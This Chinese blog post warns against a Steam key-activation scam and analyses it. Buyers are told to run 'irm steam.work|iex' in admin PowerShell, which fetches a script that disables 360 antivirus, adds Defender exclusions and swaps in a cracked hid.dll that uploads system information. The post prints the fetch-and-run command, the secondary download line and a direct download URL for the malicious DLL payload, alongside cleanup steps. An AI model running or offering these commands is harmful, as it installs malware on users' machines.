专栏/Steam入库,irm steam.work|iex 风险和原理(代码分析)

Steam入库,irm steam.work|iex 风险和原理(代码分析)

2024年03月23日 19:56--浏览 · --点赞 · --评论
粉丝:656文章:1
步骤1:按住键盘win+X ,找到powershell(终端管理员)(A) 
步骤2:输入irm steam.work|iex (请复制,不要手打,输入后按回车键,会出现steam图标,等待自动关闭)
步骤3:自动启动steam,并在steam里左下角游戏卡密输入卡密,激活完成

read-normal-img


read-normal-img


这些步骤,图片,和远远低于市场价格的CDK熟悉吗?如果熟悉,那么恭喜你(bushi,中招

这种要求进行激活游戏的,很大概率会导致你的steam红信或者直接封号

指令中间换成什么steam-run什么的,都是一路货色,没什么差别




买了,没激活

那么如果你已经购买了,但是还没激活的,请立即找到店家进行退款,可以直接走第三方客服进行维权,运行不知名的指令,这是很危险的行为



买了,激活了

如果你已经激活了,那么请先给steam关掉,避免被远在大陆另一侧的G胖发红色情书(如果关不掉可以使用Ctrl + Shift + ESC直接结束进程)

然后卸载steam并且重新安装,并且找到你C:\Users\用户名\AppData\Local\SteamActiveC:\Users\用户名\AppData\Local\Steam手动删除,不然等于白卸

然后查看你的Windows Defender白名单(打开你的powershell,这次也是管理员,执行 Get-MpPreference | Select-Object -ExpandProperty ExclusionPath,如果找到了和steam相关的东西,那么Remove-MpPreference -ExclusionPath 你刚才的文件位置)删除掉被强行加入杀毒软件白名单的假动态链接库文件



没买,看完原理心有不忿

举报,干死他!

破解有错,不告诉用户相关的风险,甚至不告诉用户这是破解,罪该万死!





实现原理

首先,我们要知道这个指令是干什么的。

irm steam.work | iex

irm -> Invoke-RestMethod的缩写,从URL中下载内容

iex nvoke-Expression的缩写,运行脚本的意思

合起来就是从这个steam.work下载脚本并且立即执行


那么有问题多的朋友就会问了,这个steam.work我访问就是官方的商店啊,欸,这个是不对的,因为这里是直接下载脚本执行,所以我们应该下载下来看看,也就是

(irm steam.work) | Out-File -FilePath "D:\aha\steam_work.ps1"

read-normal-img

这个文件下载下来如果当作powershell用编译器打开,一看就能看出来,只有一行代码

irm steam.work/pwsDwFile/new -OutFile x.ps1

read-normal-img

又是一个下载脚本的代码,那么我们知道,事出反常必有妖,照样,下载下来看看

这个脚本里,就是真正的坏事做尽了,因为考虑到有些小伙伴不是很熟悉powershell,我给差不多每一行都来了中文的注释(绿色的就是)(给我整个赞,快点的

read-normal-img


read-normal-img

那么他干了什么呢?

  1. 如果当前正在运行流氓头子360,那么给他强制关闭(头子就是有牌面)
  2. 给Steam路径添加到Windows Defender的白名单里,方便接下来的操作,并且不论如何都输出绿色的成功(只能说是诡计多端)
  3. 替换你steam安装目录下的hid.dll文件(这是一个破解的动态连接库文件,用来在你输入卖家给的CDK之后显示成功并且骗过G胖让你下载游戏)
  4. 替换你C盘当前用户下的SteamActive中的hid.dll文件(和上一个差不多,但是这个里面有对当前用户的系统信息上传)

我只能说,坏事做尽

好在他并没有对于系统进行安装病毒等等操作,不然专题就得加上一个《爆破无良商家和他脆弱的服务器》的章节了


最后

贪小便宜吃大亏,远远低于官方价格的这些奇怪操作还是尽量少尝试。如果真的是学生党手中结余,可以三五好友一起买一个,用Steam推出的共享家庭组(在线找义父,又称赛博仙人跳)


这个steam.work是在扬州的一个ip,不知道走没走ip跳转代理(如果赞够多,可以直接加入章节 《爆破无良商家和他脆弱的服务器,顺便找到他亲爱的老家去》)

read-normal-img


然后,dll文件已经弄下来了,因为比较多,并且涉及到了一些不太好的手法,感兴趣的同学可以自己去反编译一下看看里面藏了什么鬼东西(或者点赞够多了可以直接展开说说)

irm -Uri "http://steam.work/pwsDwFile/9b96dac2bb0ba18d56068fabc5b17185.pdf" -OutFile 你的目标文件名字

read-normal-img




投诉或建议